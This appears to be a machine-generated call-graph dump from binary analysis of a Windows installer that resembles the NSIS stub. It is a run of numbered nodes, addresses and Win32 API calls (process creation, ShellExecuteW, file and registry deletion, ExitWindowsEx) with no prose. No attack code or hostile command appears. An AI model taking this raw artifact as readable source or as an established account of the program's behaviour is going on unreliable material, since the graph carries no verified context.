402ab3 18 API calls 3454->3455 3456 40195c 3455->3456 3457 402ad0 18 API calls 3456->3457 3458 401965 3457->3458 3459 401979 lstrlenW 3458->3459 3461 4019b5 3458->3461 3460 401983 3459->3460 3460->3461 3465 405d46 lstrcpynW 3460->3465 3463 40199e 3463->3461 3464 4019ab lstrlenW 3463->3464 3464->3461 3465->3463 3466 40274b 3467 402ad0 18 API calls 3466->3467 3468 402759 3467->3468 3469 40276f 3468->3469 3470 402ad0 18 API calls 3468->3470 3471 4059aa 2 API calls 3469->3471 3470->3469 3472 402775 3471->3472 3492 4059cf GetFileAttributesW CreateFileW 3472->3492 3474 402782 3475 40282b 3474->3475 3476 40278e GlobalAlloc 3474->3476 3479 402833 DeleteFileW 3475->3479 3480 402846 3475->3480 3477 402822 CloseHandle 3476->3477 3478 4027a7 3476->3478 3477->3475 3493 403192 SetFilePointer 3478->3493 3479->3480 3482 4027ad 3483 403160 ReadFile 3482->3483 3484 4027b6 GlobalAlloc 3483->3484 3485 4027c6 3484->3485 3486 4027fa WriteFile GlobalFree 3484->3486 3487 402f38 33 API calls 3485->3487 3488 402f38 33 API calls 3486->3488 3491 4027d3 3487->3491 3489 40281f 3488->3489 3489->3477 3490 4027f1 GlobalFree 3490->3486 3491->3490 3492->3474 3493->3482 3497 40284c 3498 402ab3 18 API calls 3497->3498 3499 402852 3498->3499 3500 402875 3499->3500 3501 40288e 3499->3501 3507 402729 3499->3507 3502 40287a 3500->3502 3503 40288b 3500->3503 3504 4028a4 3501->3504 3505 402898 3501->3505 3511 405d46 lstrcpynW 3502->3511 3512 405c8d wsprintfW 3503->3512 3506 405d68 18 API calls 3504->3506 3508 402ab3 18 API calls 3505->3508 3506->3507 3508->3507 3511->3507 3512->3507 3513 40164d 3514 402ad0 18 API calls 3513->3514 3515 401653 3514->3515 3516 406089 2 API calls 3515->3516 3517 401659 3516->3517 3518 4019cf 3519 402ad0 18 API calls 3518->3519 3520 4019d6 3519->3520 3521 402ad0 18 API calls 3520->3521 3522 4019df 3521->3522 3523 4019e6 lstrcmpiW 3522->3523 3524 4019f8 lstrcmpW 3522->3524 3525 4019ec 3523->3525 3524->3525 2864 401e51 2865 402ad0 18 API calls 2864->2865 2866 401e57 2865->2866 2867 404ffa 25 API calls 2866->2867 2868 401e61 2867->2868 2882 4054c8 CreateProcessW 2868->2882 2871 401ec6 CloseHandle 2875 402729 2871->2875 2872 401e77 WaitForSingleObject 2873 401e89 2872->2873 2874 401e9b GetExitCodeProcess 2873->2874 2885 4060e9 2873->2885 2876 401eba 2874->2876 2877 401ead 2874->2877 2876->2871 2881 401eb8 2876->2881 2889 405c8d wsprintfW 2877->2889 2881->2871 2883 401e67 2882->2883 2884 4054f7 CloseHandle 2882->2884 2883->2871 2883->2872 2883->2875 2884->2883 2886 406106 PeekMessageW 2885->2886 2887 401e90 WaitForSingleObject 2886->2887 2888 4060fc DispatchMessageW 2886->2888 2887->2873 2888->2886 2889->2881 2890 402251 2891 40225f 2890->2891 2892 402259 2890->2892 2894 40226d 2891->2894 2895 402ad0 18 API calls 2891->2895 2893 402ad0 18 API calls 2892->2893 2893->2891 2896 40227b 2894->2896 2897 402ad0 18 API calls 2894->2897 2895->2894 2898 402ad0 18 API calls 2896->2898 2897->2896 2899 402284 WritePrivateProfileStringW 2898->2899 3526 4028d1 3527 402ab3 18 API calls 3526->3527 3528 4028d7 3527->3528 3529 40290a 3528->3529 3530 402729 3528->3530 3532 4028e5 3528->3532 3529->3530 3531 405d68 18 API calls 3529->3531 3531->3530 3532->3530 3534 405c8d wsprintfW 3532->3534 3534->3530 2900 401752 2901 402ad0 18 API calls 2900->2901 2902 401759 2901->2902 2903 401781 2902->2903 2904 401779 2902->2904 2961 405d46 lstrcpynW 2903->2961 2960 405d46 lstrcpynW 2904->2960 2907 40177f 2911 405fda 5 API calls 2907->2911 2908 40178c 2909 4057ae 3 API calls 2908->2909 2910 401792 lstrcatW 2909->2910 2910->2907 2933 40179e 2911->2933 2912 406089 2 API calls 2912->2933 2913 4059aa 2 API calls 2913->2933 2915 4017b0 CompareFileTime 2915->2933 2916 401870 2918 404ffa 25 API calls 2916->2918 2917 401847 2919 404ffa 25 API calls 2917->2919 2927 40185c 2917->2927 2920 40187a 2918->2920 2919->2927 2939 402f38 2920->2939 2923 4018a1 SetFileTime 2924 4018b3 CloseHandle 2923->2924 2926 4018c4 2924->2926 2924->2927 2925 405d68 18 API calls 2925->2933 2928 4018c9 2926->2928 2929 4018dc 2926->2929 2931 405d68 18 API calls 2928->2931 2932 405d68 18 API calls 2929->2932 2930 405d46 lstrcpynW 2930->2933 2934 4018d1 lstrcatW 2931->2934 2935 4018e4 2932->2935 2933->2912 2933->2913 2933->2915 2933->2916 2933->2917 2933->2925 2933->2930 2938 4059cf GetFileAttributesW CreateFileW 2933->2938 2962 405529 2933->2962 2934->2935 2937 405529 MessageBoxIndirectW 2935->2937 2937->2927 2938->2933 2941 402f53 2939->2941 2940 402f80 2966 403160 ReadFile 2940->2966 2941->2940 2968 403192 SetFilePointer 2941->2968 2945 4030f6 2947 4030fa 2945->2947 2948 403112 2945->2948 2946 402f9d GetTickCount 2952 40188d 2946->2952 2959 402fea 2946->2959 2949 403160 ReadFile 2947->2949 2951 403160 ReadFile 2948->2951 2948->2952 2953 40312d WriteFile 2948->2953 2949->2952 2950 403160 ReadFile 2950->2959 2951->2948 2952->2923 2952->2924 2953->2952 2954 403141 2953->2954 2954->2948 2954->2952 2955 403040 GetTickCount 2955->2959 2956 403065 MulDiv wsprintfW 2957 404ffa 25 API calls 2956->2957 2957->2959 2958 4030a9 WriteFile 2958->2952 2958->2959 2959->2950 2959->2952 2959->2955 2959->2956 2959->2958 2960->2907 2961->2908 2963 40553e 2962->2963 2964 40558a 2963->2964 2965 405552 MessageBoxIndirectW 2963->2965 2964->2933 2965->2964 2967 402f8b 2966->2967 2967->2945 2967->2946 2967->2952 2968->2940 3535 402452 3536 402bda 19 API calls 3535->3536 3537 40245c 3536->3537 3538 402ab3 18 API calls 3537->3538 3539 402465 3538->3539 3540 402489 RegEnumValueW 3539->3540 3541 40247d RegEnumKeyW 3539->3541 3543 402729 3539->3543 3542 4024a2 RegCloseKey 3540->3542 3540->3543 3541->3542 3542->3543 3545 4022d3 3546 402303 3545->3546 3547 4022d8 3545->3547 3549 402ad0 18 API calls 3546->3549 3548 402bda 19 API calls 3547->3548 3550 4022df 3548->3550 3551 40230a 3549->3551 3552 402ad0 18 API calls 3550->3552 3555 402320 3550->3555 3556 402b10 RegOpenKeyExW 3551->3556 3554 4022f0 RegDeleteValueW RegCloseKey 3552->3554 3554->3555 3559 402b3b 3556->3559 3564 402b87 3556->3564 3557 402b61 RegEnumKeyW 3558 402b73 RegCloseKey 3557->3558 3557->3559 3561 4060b0 3 API calls 3558->3561 3559->3557 3559->3558 3560 402b98 RegCloseKey 3559->3560 3562 402b10 3 API calls 3559->3562 3560->3564 3563 402b83 3561->3563 3562->3559 3563->3564 3565 402bb3 RegDeleteKeyW 3563->3565 3564->3555 3565->3564 3566 401ed4 3567 402ad0 18 API calls 3566->3567 3568 401edb 3567->3568 3569 406089 2 API calls 3568->3569 3570 401ee1 3569->3570 3571 401ef2 3570->3571 3573 405c8d wsprintfW 3570->3573 3573->3571 3574 4014d7 3575 402ab3 18 API calls 3574->3575 3576 4014dd Sleep 3575->3576 3578 40295d 3576->3578 3579 4036d8 3580 4036e3 3579->3580 3581 4036e7 3580->3581 3582 4036ea GlobalAlloc 3580->3582 3582->3581 3583 40155b 3584 402903 3583->3584 3587 405c8d wsprintfW 3584->3587 3586 402908 3587->3586 3588 4026dc 3589 4026db 3588->3589 3589->3588 3590 4026ec FindNextFileW 3589->3590 3592 4026f7 3589->3592 3591 40273e 3590->3591 3590->3592 3594 405d46 lstrcpynW 3591->3594 3594->3592 3085 4031dd #17 SetErrorMode OleInitialize 3086 4060b0 3 API calls 3085->3086 3087 403220 SHGetFileInfoW 3086->3087 3158 405d46 lstrcpynW 3087->3158 3089 40324b GetCommandLineW 3159 405d46 lstrcpynW 3089->3159 3091 40325d GetModuleHandleW 3092 403275 3091->3092 3093 4057db CharNextW 3092->3093 3094 403284 CharNextW 3093->3094 3105 403294 3094->3105 3095 403364 3096 403378 GetTempPathW 3095->3096 3160 4031a9 3096->3160 3098 403390 3100 403394 GetWindowsDirectoryW lstrcatW 3098->3100 3101 4033ea DeleteFileW 3098->3101 3099 4057db CharNextW 3099->3105 3103 4031a9 11 API calls 3100->3103 3168 402cff GetTickCount GetModuleFileNameW 3101->3168 3106 4033b0 3103->3106 3104 4033fe 3107 403496 3104->3107 3110 403486 3104->3110 3114 4057db CharNextW 3104->3114 3105->3095 3105->3099 3109 403366 3105->3109 3106->3101 3108 4033b4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3106->3108 3253 403640 3107->3253 3113 4031a9 11 API calls 3108->3113 3250 405d46 lstrcpynW 3109->3250 3196 40371a 3110->3196 3117 4033e2 3113->3117 3118 403419 3114->3118 3117->3101 3117->3107 3125 403460 3118->3125 3126 4034c5 lstrcatW lstrcmpiW 3118->3126 3119 4035a5 3121 403628 ExitProcess 3119->3121 3123 4060b0 3 API calls 3119->3123 3120 4034af 3122 405529 MessageBoxIndirectW 3120->3122 3127 4034bd ExitProcess 3122->3127 3128 4035b4 3123->3128 3129 4058b6 18 API calls 3125->3129 3126->3107 3130 4034e1 CreateDirectoryW SetCurrentDirectoryW 3126->3130 3131 4060b0 3 API calls 3128->3131 3132 40346c 3129->3132 3133 403504 3130->3133 3134 4034f9 3130->3134 3137 4035bd 3131->3137 3132->3107 3251 405d46 lstrcpynW 3132->3251 3261 405d46 lstrcpynW 3133->3261 3260 405d46 lstrcpynW 3134->3260 3139 4060b0 3 API calls 3137->3139 3141 4035c6 3139->3141 3140 40347b 3252 405d46 lstrcpynW 3140->3252 3144 403614 ExitWindowsEx 3141->3144 3149 4035d4 GetCurrentProcess 3141->3149 3143 405d68 18 API calls 3145 403543 DeleteFileW 3143->3145 3144->3121 3146 403621 3144->3146 3147 403550 CopyFileW 3145->3147 3155 403512 3145->3155 3262 40140b 3146->3262 3147->3155 3151 4035e4 3149->3151 3150 403599 3152 405be0 40 API calls 3150->3152 3151->3144 3152->3107 3153 405be0 40 API calls 3153->3155 3154 405d68 18 API calls 3154->3155 3155->3143 3155->3150 3155->3153 3155->3154 3156 4054c8 2 API calls 3155->3156 3157 403584 CloseHandle 3155->3157 3156->3155 3157->3155 3158->3089 3159->3091 3161 405fda 5 API calls 3160->3161 3162 4031b5 3161->3162 3163 4031bf 3162->3163 3164 4057ae 3 API calls 3162->3164 3163->3098 3165 4031c7 CreateDirectoryW 3164->3165 3265 4059fe 3165->3265 3269 4059cf GetFileAttributesW CreateFileW 3168->3269 3170 402d3f 3189 402d4f 3170->3189 3270 405d46 lstrcpynW 3170->3270 3172 402d65 3173 4057fa 2 API calls 3172->3173 3174 402d6b 3173->3174 3271 405d46 lstrcpynW 3174->3271 3176 402d76 GetFileSize 3177 402e72 3176->3177 3195 402d8d 3176->3195 3272 402c9b 3177->3272 3179 402e7b 3181 402eab GlobalAlloc 3179->3181 3179->3189 3283 403192 SetFilePointer 3179->3283 3180 403160 ReadFile 3180->3195 3284 403192 SetFilePointer 3181->3284 3183 402ede 3186 402c9b 6 API calls 3183->3186 3185 402ec6 3188 402f38 33 API calls 3185->3188 3186->3189 3187 402e94 3190 403160 ReadFile 3187->3190 3193 402ed2 3188->3193 3189->3104 3191 402e9f 3190->3191 3191->3181 3191->3189 3192 402c9b 6 API calls 3192->3195 3193->3189 3193->3193 3194 402f0f SetFilePointer 3193->3194 3194->3189 3195->3177 3195->3180 3195->3183 3195->3189 3195->3192 3197 4060b0 3 API calls 3196->3197 3198 40372e 3197->3198 3199 403734 3198->3199 3200 403746 3198->3200 3294 405c8d wsprintfW 3199->3294 3201 405c13 3 API calls 3200->3201 3202 403776 3201->3202 3204 403795 lstrcatW 3202->3204 3206 405c13 3 API calls 3202->3206 3205 403744 3204->3205 3285 4039f0 3205->3285 3206->3204 3209 4058b6 18 API calls 3210 4037c7 3209->3210 3211 40385b 3210->3211 3213 405c13 3 API calls 3210->3213 3212 4058b6 18 API calls 3211->3212 3214 403861 3212->3214 3215 4037f9 3213->3215 3216 403871 LoadImageW 3214->3216 3217 405d68 18 API calls 3214->3217 3215->3211 3221 40381a lstrlenW 3215->3221 3224 4057db CharNextW 3215->3224 3218 403917 3216->3218 3219 403898 RegisterClassW 3216->3219 3217->3216 3220 40140b 2 API calls 3218->3220 3222 4038ce SystemParametersInfoW CreateWindowExW 3219->3222 3249 403921 3219->3249 3223 40391d 3220->3223 3225 403828 lstrcmpiW 3221->3225 3226 40384e 3221->3226 3222->3218 3231 4039f0 19 API calls 3223->3231 3223->3249 3229 403817 3224->3229 3225->3226 3227 403838 GetFileAttributesW 3225->3227 3228 4057ae 3 API calls 3226->3228 3230 403844 3227->3230 3232 403854 3228->3232 3229->3221 3230->3226 3233 4057fa 2 API calls 3230->3233 3234 40392e 3231->3234 3295 405d46 lstrcpynW 3232->3295 3233->3226 3236 40393a ShowWindow LoadLibraryW 3234->3236 3237 4039bd 3234->3237 3239 403960 GetClassInfoW 3236->3239 3240 403959 LoadLibraryW 3236->3240 3238 4050cd 5 API calls 3237->3238 3241 4039c3 3238->3241 3242 403974 GetClassInfoW RegisterClassW 3239->3242 3243 40398a DialogBoxParamW 3239->3243 3240->3239 3244 4039c7 3241->3244 3245 4039df 3241->3245 3242->3243 3246 40140b 2 API calls 3243->3246 3248 40140b 2 API calls 3244->3248 3244->3249 3247 40140b 2 API calls 3245->3247 3246->3249 3247->3249 3248->3249 3249->3107 3250->3096 3251->3140 3252->3110 3254 403658 3253->3254 3255 40364a CloseHandle 3253->3255 3297 403685 3254->3297 3255->3254 3258 4055d5 71 API calls 3259 40349f OleUninitialize 3258->3259 3259->3119 3259->3120 3260->3133 3261->3155 3263 401389 2 API calls 3262->3263 3264 401420 3263->3264 3264->3121 3266 405a0b GetTickCount GetTempFileNameW 3265->3266 3267 405a41 3266->3267 3268 4031db 3266->3268 3267->3266 3267->3268 3268->3098 3269->3170 3270->3172 3271->3176 3273 402ca4 3272->3273 3274 402cbc 3272->3274 3275 402cb4 3273->3275 3276 402cad DestroyWindow 3273->3276 3277 402cc4 3274->3277 3278 402ccc GetTickCount 3274->3278 3275->3179 3276->3275 3279 4060e9 2 API calls 3277->3279 3280 402cda CreateDialogParamW ShowWindow 3278->3280 3281 402cfd 3278->3281 3282 402cca 3279->3282 3280->3281 3281->3179 3282->3179 3283->3187 3284->3185 3286 403a04 3285->3286 3296 405c8d wsprintfW 3286->3296 3288 403a75 3289 405d68 18 API calls 3288->3289 3290 403a81 SetWindowTextW 3289->3290 3291 4037a5 3290->3291 3292 403a9d 3290->3292 3291->3209 3292->3291 3293 405d68 18 API calls 3292->3293 3293->3292 3294->3205 3295->3211 3296->3288 3298 403693 3297->3298 3299 40365d 3298->3299 3300 403698 FreeLibrary GlobalFree 3298->3300 3299->3258 3300->3299 3300->3300 3374 4023de 3385 402bda 3374->3385 3376 4023e8 3377 402ad0 18 API calls 3376->3377 3378 4023f1 3377->3378 3379 402729 3378->3379 3380 4023fc RegQueryValueExW 3378->3380 3381 40241c 3380->3381 3384 402422 RegCloseKey 3380->3384 3381->3384 3389 405c8d wsprintfW 3381->3389 3384->3379 3386 402ad0 18 API calls 3385->3386 3387 402bf3 3386->3387 3388 402c01 RegOpenKeyExW 3387->3388 3388->3376 3389->3384 3595 40165e 3596 402ad0 18 API calls 3595->3596 3597 401665 3596->3597 3598 402ad0 18 API calls 3597->3598 3599 40166e 3598->3599 3600 402ad0 18 API calls 3599->3600 3601 401677 MoveFileW 3600->3601 3602 401683 3601->3602 3603 40168a 3601->3603 3605 401423 25 API calls 3602->3605 3604 406089 2 API calls 3603->3604 3607 402195 3603->3607 3606 401699 3604->3606 3605->3607 3606->3607 3608 405be0 40 API calls 3606->3608 3608->3602 3609 4040e3 lstrlenW 3610 404102 3609->3610 3611 404104 WideCharToMultiByte 3609->3611 3610->3611 3612 401ce5 GetDlgItem GetClientRect 3613 402ad0 18 API calls 3612->3613 3614 401d17 LoadImageW SendMessageW 3613->3614 3615 401d35 DeleteObject 3614->3615 3616 40295d 3614->3616 3615->3616 3617 4043e9 3618 4043f9 3617->3618 3619 40441f 3617->3619 3621 403f95 19 API calls 3618->3621 3620 403ffc 8 API calls 3619->3620 3622 40442b 3620->3622 3623 404406 SetDlgItemTextW 3621->3623 3623->3619 3624 40206a 3625 402ad0 18 API calls 3624->3625 3626 402071 3625->3626 3627 402ad0 18 API calls 3626->3627 3628 40207b 3627->3628 3629 402ad0 18 API calls 3628->3629 3630 402084 3629->3630 3631 402ad0 18 API calls 3630->3631 3632 40208e 3631->3632 3633 402ad0 18 API calls 3632->3633 3634 402098 3633->3634 3635 4020ac CoCreateInstance 3634->3635 3636 402ad0 18 API calls 3634->3636 3639 4020cb 3635->3639 3636->3635 3637 401423 25 API calls 3638 402195 3637->3638 3639->3637 3639->3638 3640 40156b 3641 401584 3640->3641 3642 40157b ShowWindow 3640->3642 3643 401592 ShowWindow 3641->3643 3644 40295d 3641->3644 3642->3641 3643->3644 3645 4024ec 3646 4024f1 3645->3646 3647 40250a 3645->3647 3648 402ab3 18 API calls 3646->3648 3649 402510 3647->3649 3650 40253c 3647->3650 3651 4024f8 3648->3651 3652 402ad0 18 API calls 3649->3652 3653 402ad0 18 API calls 3650->3653 3656 402565 WriteFile 3651->3656 3657 402729 3651->3657 3654 402517 WideCharToMultiByte lstrlenA 3652->3654 3655 402543 lstrlenW 3653->3655 3654->3651 3655->3651 3656->3657 3658 404f6e 3659 404f92 3658->3659 3660 404f7e 3658->3660 3663 404f9a IsWindowVisible 3659->3663 3669 404fb1 3659->3669 3661 404f84 3660->3661 3662 404fdb 3660->3662 3665 403fe1 SendMessageW 3661->3665 3664 404fe0 CallWindowProcW 3662->3664 3663->3662 3666 404fa7 3663->3666 3667 404f8e 3664->3667 3665->3667 3671 4048c4 SendMessageW 3666->3671 3669->3664 3676 404944 3669->3676 3672 404923 SendMessageW 3671->3672 3673 4048e7 GetMessagePos ScreenToClient SendMessageW 3671->3673 3675 40491b 3672->3675 3674 404920 3673->3674 3673->3675 3674->3672 3675->3669 3685 405d46 lstrcpynW 3676->3685 3678 404957 3686 405c8d wsprintfW 3678->3686 3680 404961 3681 40140b 2 API calls 3680->3681 3682 40496a 3681->3682 3687 405d46 lstrcpynW 3682->3687 3684 404971 3684->3662 3685->3678 3686->3680 3687->3684 3688 4018ef 3689 401926 3688->3689 3690 402ad0 18 API calls 3689->3690 3691 40192b 3690->3691 3692 4055d5 71 API calls 3691->3692 3693 401934 3692->3693 3694 402571 3695 402ab3 18 API calls 3694->3695 3699 40257a 3695->3699 3696 4025c1 ReadFile 3696->3699 3704 402642 3696->3704 3697 4025fe ReadFile 3697->3699 3697->3704 3698 4025de MultiByteToWideChar 3698->3699 3699->3696 3699->3697 3699->3698 3700 402644 3699->3700 3701 402655 3699->3701 3699->3704 3705 405c8d wsprintfW 3700->3705 3703 402671 SetFilePointer 3701->3703 3701->3704 3703->3704 3705->3704 3706 4014f1 SetForegroundWindow 3707 40295d 3706->3707 3708 4018f2 3709 402ad0 18 API calls 3708->3709 3710 4018f9 3709->3710 3711 405529 MessageBoxIndirectW 3710->3711 3712 401902 3711->3712 3713 401df3 3714 402ad0 18 API calls 3713->3714 3715 401df9 3714->3715 3716 402ad0 18 API calls 3715->3716 3717 401e02 3716->3717 3718 402ad0 18 API calls 3717->3718 3719 401e0b 3718->3719 3720 402ad0 18 API calls 3719->3720 3721 401e14 3720->3721 3722 401423 25 API calls 3721->3722 3723 401e1b ShellExecuteW 3722->3723 3724 401e4c 3723->3724 3730 404976 GetDlgItem GetDlgItem 3731 4049c8 7 API calls 3730->3731 3740 404be1 3730->3740 3732 404a6b DeleteObject 3731->3732 3733 404a5e SendMessageW 3731->3733 3734 404a74 3732->3734 3733->3732 3735 404aab 3734->3735 3739 405d68 18 API calls 3734->3739 3737 403f95 19 API calls 3735->3737 3736 404cc5 3738 404d71 3736->3738 3748 404d1e SendMessageW 3736->3748 3769 404bd4 3736->3769 3741 404abf 3737->3741 3742 404d83 3738->3742 3743 404d7b SendMessageW 3738->3743 3744 404a8d SendMessageW SendMessageW 3739->3744 3740->3736 3746 4048c4 5 API calls 3740->3746 3773 404c52 3740->3773 3747 403f95 19 API calls 3741->3747 3745 404dac 3742->3745 3751 404d95 ImageList_Destroy 3742->3751 3752 404d9c 3742->3752 3743->3742 3744->3734 3754 404f1b 3745->3754 3772 404944 4 API calls 3745->3772 3777 404de7 3745->3777 3746->3773 3753 404acd 3747->3753 3755 404d33 SendMessageW 3748->3755 3748->3769 3749 403ffc 8 API calls 3756 404f67 3749->3756 3750 404cb7 SendMessageW 3750->3736 3751->3752 3752->3745 3757 404da5 GlobalFree 3752->3757 3758 404ba2 GetWindowLongW SetWindowLongW 3753->3758 3766 404b1d SendMessageW 3753->3766 3768 404b9c 3753->3768 3770 404b59 SendMessageW 3753->3770 3771 404b6a SendMessageW 3753->3771 3759 404f2d ShowWindow GetDlgItem ShowWindow 3754->3759 3754->3769 3763 404d46 3755->3763 3757->3745 3760 404bbb 3758->3760 3759->3769 3761 404bc1 ShowWindow 3760->3761 3762 404bd9 3760->3762 3781 403fca SendMessageW 3761->3781 3782 403fca SendMessageW 3762->3782 3767 404d57 SendMessageW 3763->3767 3766->3753 3767->3738 3768->3758 3768->3760 3769->3749 3770->3753 3771->3753 3772->3777 3773->3736 3773->3750 3774 404ef1 InvalidateRect 3774->3754 3775 404f07 3774->3775 3783 4047de 3775->3783 3776 404e15 SendMessageW 3780 404e2b 3776->3780 3777->3776 3777->3780 3779 404e9f SendMessageW SendMessageW 3779->3780 3780->3774 3780->3779 3781->3769 3782->3740 3784 4047fb 3783->3784 3785 405d68 18 API calls 3784->3785 3786 404830 3785->3786 3787 405d68 18 API calls 3786->3787 3788 40483b 3787->3788 3789 405d68 18 API calls 3788->3789 3790 40486c lstrlenW wsprintfW SetDlgItemTextW 3789->3790 3790->3754 3791 404778 3792 4047a4 3791->3792 3793 404788 3791->3793 3795 4047d7 3792->3795 3796 4047aa SHGetPathFromIDListW 3792->3796 3802 40550d GetDlgItemTextW 3793->3802 3798 4047c1 SendMessageW 3796->3798 3799 4047ba 3796->3799 3797 404795 SendMessageW 3797->3792 3798->3795 3800 40140b 2 API calls 3799->3800 3800->3798 3802->3797 3803 4014ff 3804 401507 3803->3804 3806 40151a 3803->3806 3805 402ab3 18 API calls 3804->3805 3805->3806 3807 401000 3808 401037 BeginPaint GetClientRect 3807->3808 3809 40100c DefWindowProcW 3807->3809 3811 4010f3 3808->3811 3812 401179 3809->3812 3813 401073 CreateBrushIndirect FillRect DeleteObject 3811->3813 3814 4010fc 3811->3814 3813->3811 3815 401102 CreateFontIndirectW 3814->3815 3816 401167 EndPaint 3814->3816 3815->3816 3817 401112 6 API calls 3815->3817 3816->3812 3817->3816 3818 401a00 3819 402ad0 18 API calls 3818->3819 3820 401a09 ExpandEnvironmentStringsW 3819->3820 3821 401a1d 3820->3821 3823 401a30 3820->3823 3822 401a22 lstrcmpW 3821->3822 3821->3823 3822->3823 3824 401b01 3825 402ad0 18 API calls 3824->3825 3826 401b08 3825->3826 3827 402ab3 18 API calls 3826->3827 3828 401b11 wsprintfW 3827->3828 3829 40295d 3828->3829 3830 402706 3831 402ad0 18 API calls 3830->3831 3832 40270d FindFirstFileW 3831->3832 3833 402720 3832->3833 3834 402735 3832->3834 3838 405c8d wsprintfW 3834->3838 3836 40273e 3839 405d46 lstrcpynW 3836->3839 3838->3836 3839->3833 2852 401f08 2853 402ad0 18 API calls 2852->2853 2854 401f0f GetFileVersionInfoSizeW 2853->2854 2855 401f36 GlobalAlloc 2854->2855 2856 40295d 2854->2856 2855->2856 2857 401f4a 2855->2857 2858 401f8c 2857->2858 2862 405c8d wsprintfW 2857->2862 2858->2856 2860 401f7e 2863 405c8d wsprintfW 2860->2863 2862->2860 2863->2858 3840 401c8e 3841 402ab3 18 API calls 3840->3841 3842 401c94 IsWindow 3841->3842 3843 4019f0 3842->3843 3844 40268f 3845 402696 3844->3845 3848 402908 3844->3848 3846 402ab3 18 API calls 3845->3846 3847 4026a1 3846->3847 3849 4026a8 SetFilePointer 3847->3849 3849->3848 3850 4026b8 3849->3850 3852 405c8d wsprintfW 3850->3852 3852->3848 3853 401491 3854 404ffa 25 API calls 3853->3854 3855 401498 3854->3855 2969 402293 2970 402ad0 18 API calls 2969->2970 2971 4022a2 2970->2971 2972 402ad0 18 API calls 2971->2972 2973 4022ab 2972->2973 2974 402ad0 18 API calls 2973->2974 2975 4022b5 GetPrivateProfileStringW 2974->2975 3856 402c15 3857 402c40 3856->3857 3858 402c27 SetTimer 3856->3858 3859 402c95 3857->3859 3860 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3857->3860 3858->3857 3860->3859 3861 401718 3862 402ad0 18 API calls 3861->3862 3863 40171f SearchPathW 3862->3863 3864 40173a 3863->3864 3865 401f98 3866 40205c 3865->3866 3867 401faa 3865->3867 3870 401423 25 API calls 3866->3870 3868 402ad0 18 API calls 3867->3868 3869 401fb1 3868->3869 3871 402ad0 18 API calls 3869->3871 3876 402195 3870->3876 3872 401fba 3871->3872 3873 401fd0 LoadLibraryExW 3872->3873 3874 401fc2 GetModuleHandleW 3872->3874 3873->3866 3875 401fe1 3873->3875 3874->3873 3874->3875 3885 40611c WideCharToMultiByte 3875->3885 3879 401ff2 3882 401423 25 API calls 3879->3882 3883 402002 3879->3883 3880 40202b 3881 404ffa 25 API calls 3880->3881 3881->3883 3882->3883 3883->3876 3884 40204e FreeLibrary 3883->3884 3884->3876 3886 406146 GetProcAddress 3885->3886 3887 401fec 3885->3887 3886->3887 3887->3879 3887->3880 3081 40159b 3082 402ad0 18 API calls 3081->3082 3083 4015a2 SetFileAttributesW 3082->3083 3084 4015b4 3083->3084 3888 40149e 3889 40223c 3888->3889 3890 4014ac PostQuitMessage 3888->3890 3890->3889 3891 40219e 3892 402ad0 18 API calls 3891->3892 3893 4021a4 3892->3893 3894 402ad0 18 API calls 3893->3894 3895 4021ad 3894->3895 3896 402ad0 18 API calls 3895->3896 3897 4021b6 3896->3897 3898 406089 2 API calls 3897->3898 3899 4021bf 3898->3899 3900 4021d0 lstrlenW lstrlenW 3899->3900 3901 4021c3 3899->3901 3903 404ffa 25 API calls 3900->3903 3902 404ffa 25 API calls 3901->3902 3905 4021cb 3901->3905 3902->3905 3904 40220e SHFileOperationW 3903->3904 3904->3901 3904->3905 3906 401b22 3907 401b73 3906->3907 3908 401b2f 3906->3908 3910 401b78 3907->3910 3911 401b9d GlobalAlloc 3907->3911 3909 402229 3908->3909 3915 401b46 3908->3915 3912 405d68 18 API calls 3909->3912 3921 401bb8 3910->3921 3927 405d46 lstrcpynW 3910->3927 3913 405d68 18 API calls 3911->3913 3914 402236 3912->3914 3913->3921 3920 405529 MessageBoxIndirectW 3914->3920 3925 405d46 lstrcpynW 3915->3925 3918 401b8a GlobalFree 3918->3921 3919 401b55 3926 405d46 lstrcpynW 3919->3926 3920->3921 3923 401b64 3928 405d46 lstrcpynW 3923->3928 3925->3919 3926->3923 3927->3918 3928->3921 3929 402222 3930 402229 3929->3930 3932 40223c 3929->3932 3931 405d68 18 API calls 3930->3931 3933 402236 3931->3933 3934 405529 MessageBoxIndirectW 3933->3934 3934->3932 2665 401924 2666 401926 2665->2666 2671 402ad0 2666->2671 2672 402adc 2671->2672 2718 405d68 2672->2718 2675 40192b 2677 4055d5 2675->2677 2757 4058b6 2677->2757 2680 405614 2683 405755 2680->2683 2771 405d46 lstrcpynW 2680->2771 2681 4055fd DeleteFileW 2682 401934 2681->2682 2683->2682 2801 406089 FindFirstFileW 2683->2801 2685 40563a 2686 405640 lstrcatW 2685->2686 2687 40564d 2685->2687 2689 405653 2686->2689 2772 4057fa lstrlenW 2687->2772 2692 405663 lstrcatW 2689->2692 2693 405659 2689->2693 2695 40566e lstrlenW FindFirstFileW 2692->2695 2693->2692 2693->2695 2694 405773 2804 4057ae lstrlenW CharPrevW 2694->2804 2696 40574a 2695->2696 2716 405691 2695->2716 2696->2683 2698 4057db CharNextW 2698->2716 2700 40558d 5 API calls 2701 405785 2700->2701 2702 405789 2701->2702 2703 40579f 2701->2703 2702->2682 2708 404ffa 25 API calls 2702->2708 2704 404ffa 25 API calls 2703->2704 2704->2682 2705 405729 FindNextFileW 2707 405741 FindClose 2705->2707 2705->2716 2707->2696 2709 405796 2708->2709 2711 405be0 40 API calls 2709->2711 2712 40579d 2711->2712 2712->2682 2713 4055d5 64 API calls 2713->2716 2714 404ffa 25 API calls 2714->2705 2716->2698 2716->2705 2716->2713 2716->2714 2776 405d46 lstrcpynW 2716->2776 2777 40558d 2716->2777 2785 404ffa 2716->2785 2796 405be0 2716->2796 2722 405d75 2718->2722 2719 405fc0 2720 402afd 2719->2720 2752 405d46 lstrcpynW 2719->2752 2720->2675 2736 405fda 2720->2736 2722->2719 2723 405e28 GetVersion 2722->2723 2724 405f8e lstrlenW 2722->2724 2727 405d68 10 API calls 2722->2727 2729 405ea3 GetSystemDirectoryW 2722->2729 2730 405eb6 GetWindowsDirectoryW 2722->2730 2731 405fda 5 API calls 2722->2731 2732 405d68 10 API calls 2722->2732 2733 405f2f lstrcatW 2722->2733 2734 405eea SHGetSpecialFolderLocation 2722->2734 2745 405c13 RegOpenKeyExW 2722->2745 2750 405c8d wsprintfW 2722->2750 2751 405d46 lstrcpynW 2722->2751 2723->2722 2724->2722 2727->2724 